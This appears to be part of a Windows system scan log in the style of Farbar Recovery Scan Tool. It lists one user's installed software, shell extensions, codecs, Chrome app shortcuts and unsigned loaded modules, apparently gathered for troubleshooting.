WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{A2AA063E-AF50-A1F5-8925-A06EB1556644}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{7D4C7F4A-02A9-E434-6451-C8787DF28C1F}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{BC467065-9374-5345-DA3F-FCF073304A25}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Wolfram Extras 11.0 (5597552) (HKLM\...\A-WIN-Extras 11.0.1 5597552_is1) (Version: 11.0.1 - Wolfram Research, Inc.)
Wolfram Mathematica 11 (M-WIN-L 11.0.1 5597744) (HKLM\...\M-WIN-L 11.0.1 5597744_is1) (Version: 11.0.1 - Wolfram Research, Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{2AD206F1-152C-4F9D-A24E-6F93FE7A4AFC}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Grammarly\Grammarly for Microsoft Office Suite\6.7.217\DA89310249\GrammarlyShim64.dll (Grammarly, Inc. -> CompanyName)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{35B08E96-DA1F-4321-BF80-D6B53C20F3CF}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{4585263E-BEF5-4A39-A2E8-8F69E0054F0C}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{4BE56754-B616-4998-B825-D16983AEE1B2}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Grammarly\Grammarly for Microsoft Office Suite\6.7.217\DA89310249\Grammarly.AddIn.Connect.ActiveX.dll (Grammarly, Inc. -> Grammarly)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel(R) pGFX -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Autodesk\webdeploy\production\013be2658e0f76cf3bfa01262889994ea1c15a54\NPreview10.dll (Autodesk, Inc. -> )
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{E07BCA71-E88B-4A5E-BA46-69A52D6B9B20}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems Incorporated -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ 0drive.Active] -> {4585263E-BEF5-4A39-A2E8-8F69E0054F0C} => C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ 0drive.Locked] -> {E07BCA71-E88B-4A5E-BA46-69A52D6B9B20} => C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ 0drive.Synced] -> {35B08E96-DA1F-4321-BF80-D6B53C20F3CF} => C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers1: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => D:\Programy\Adobe\Acrobat\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-05-18] (Notepad++ -> )
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2020-09-09] (Google LLC -> Google)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2020-09-09] (Google LLC -> Google)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers5: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2020-01-01] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-11-21] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => D:\Programy\Adobe\Acrobat\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.xvid] => C:\Windows\SysWOW64\xvidvfw.dll [235520 2017-12-08] () [File not signed]
HKLM\...\Drivers32: [vidc.x264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [File not signed]
HKLM\...\Drivers32: [vidc.lags] => C:\Windows\SysWOW64\lagarith.dll [230080 2016-09-21] (Cole Williams Software Limited -> )
HKLM\...\Drivers32: [msacm.divxa32] => C:\Windows\SysWOW64\DivXa32.acm [291408 2013-12-17] (Packed With Joy !) [File not signed]

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Any.do.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=ocgddccilgpeepgglnlpchkpgamkgmld
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Google Keep – poznámky a seznamy.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=hmjkmjkepdijhoojdojkdfohbdgmmhki
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Vysor.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=gidgenkbbabolejbgbpnhbimgjbffefm
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\bf33aa3a868e27f5\Any.do Extension.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=kdadialhpiikehpdeejjeiikopddkjem

==================== Loaded Modules (Whitelisted) =============

2020-03-19 12:35 - 2017-04-17 10:43 - 003852800 ____N () [File not signed] C:\Program Files (x86)\Bloody7\Bloody7\Data\Mouse\Forms\Internet_Advertisement\Internet_Advertisement_DLL.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000092672 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_ctypes.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000142336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_elementtree.pyd
2020-10-05 22:07 - 2020-04-20 15:22 - 001101824 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_hashlib.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000027648 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_multiprocessing.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 000046592 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_socket.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 000050688 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_sqlite3.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 001422336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_ssl.pyd
2020-10-05 22:07 - 2015-06-11 05:34 - 000729088 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\apsw.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000071168 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\bz2.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000029184 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._AES.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000008704 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._ARC4.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000019968 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._Blowfish.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000054784 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._DES3.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000009728 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Random.OSRNG.winrandom.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000010240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Util._counter.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000007680 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Util.strxor.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000039936 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\psutil._psutil_windows.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000142336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pyexpat.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000008704 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.Qt.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 001721856 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtCore.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 001804288 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtGui.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000503808 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtNetwork.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000099840 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtOpenGL.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000193024 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtPrintSupport.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000320512 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtQml.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000416768 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtQuick.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000180224 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSensors.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000057344 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSerialPort.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000243200 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSql.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000086528 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSvg.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000065024 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtTest.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000117760 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWebKit.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000215040 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWebKitWidgets.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 003975168 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWidgets.pyd
2020-10-05 22:07 - 2016-01-11 22:46 - 000396800 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pythoncom27.dll
2020-10-05 22:07 - 2016-01-11 22:44 - 000110080 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pywintypes27.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000032256 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qdds.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000021504 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qgif.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000027648 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qicns.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000020992 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qico.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000381952 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qjp2.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000204800 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qjpeg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000218112 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qmng.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000015872 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qsvg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000015360 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qtga.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000307712 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qtiff.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000014848 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qwbmp.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000252928 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qwebp.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000877056 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\platforms\qwindows.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000010240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\select.pyd
2020-10-05 22:07 - 2020-10-03 04:52 - 000078848 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\sip.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000634368 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\sqlite3.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000687104 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\unicodedata.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000099328 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32api.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000024576 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32cred.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000017408 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32event.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000118784 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32file.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000035840 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32process.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000107520 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32security.pyd
2020-10-05 22:07 - 2016-06-27 17:25 - 000121344 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\_ctypes.pyd
2020-10-05 22:07 - 2016-06-27 17:26 - 000051712 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\_socket.pyd
2020-10-05 22:07 - 2020-10-03 04:52 - 000712578 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000714980 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000712586 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll
2020-10-05 22:07 - 2016-01-11 22:54 - 000548864 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\pythoncom27.dll
2020-10-05 22:07 - 2016-01-11 22:52 - 000137728 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\pywintypes27.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000712582 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll
2020-10-05 22:07 - 2016-06-27 17:25 - 000693248 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\unicodedata.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000130560 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32api.pyd
2020-10-05 22:07 - 2016-01-11 22:57 - 000522240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32com.shell.shell.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000223744 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32gui.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000017920 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32trace.pyd
2019-11-02 12:44 - 2019-11-02 12:44 - 098275328 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll
2019-11-02 12:44 - 2019-11-02 12:44 - 000092672 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll
2019-11-02 12:44 - 2019-11-02 12:44 - 003922432 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004110848 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Core.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004346368 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Gui.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000544768 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Multimedia.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000084992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5MultimediaWidgets.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000849408 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Network.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000266240 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5OpenGL.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000155648 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Positioning.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000262144 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5PrintSupport.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 002522624 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Qml.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 002236928 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Quick.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000143872 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Sensors.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000056320 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5SerialPort.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000152576 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Sql.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000203776 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Svg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000118784 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Test.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 017492992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5WebKit.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000193536 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5WebKitWidgets.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004372992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Widgets.dll
2016-05-04 19:08 - 2015-12-31 16:15 - 000077312 _____ (Igor Pavlov) [File not signed] D:\Programy\7-Zip\7-zip.dll
2017-09-28 19:41 - 2017-09-28 19:41 - 000266240 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2017-12-11 22:18 - 2015-02-27 11:35 - 000489984 _____ (Newtonsoft) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\Newtonsoft.Json.dll
2020-10-05 22:07 - 2020-04-20 15:19 - 002649600 _____ (Python Software Foundation) [File not signed] C:\Users\Tomika\.odrive\bin\6729\python27.dll
2020-10-05 22:07 - 2016-06-27 17:25 - 003395072 _____ (Python Software Foundation) [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\PYTHON27.DLL
2019-11-02 12:44 - 2019-11-02 12:44 - 000547840 _____ (The Chromium Authors) [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 023507968 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icudt52.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 001798656 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icuin52.dll
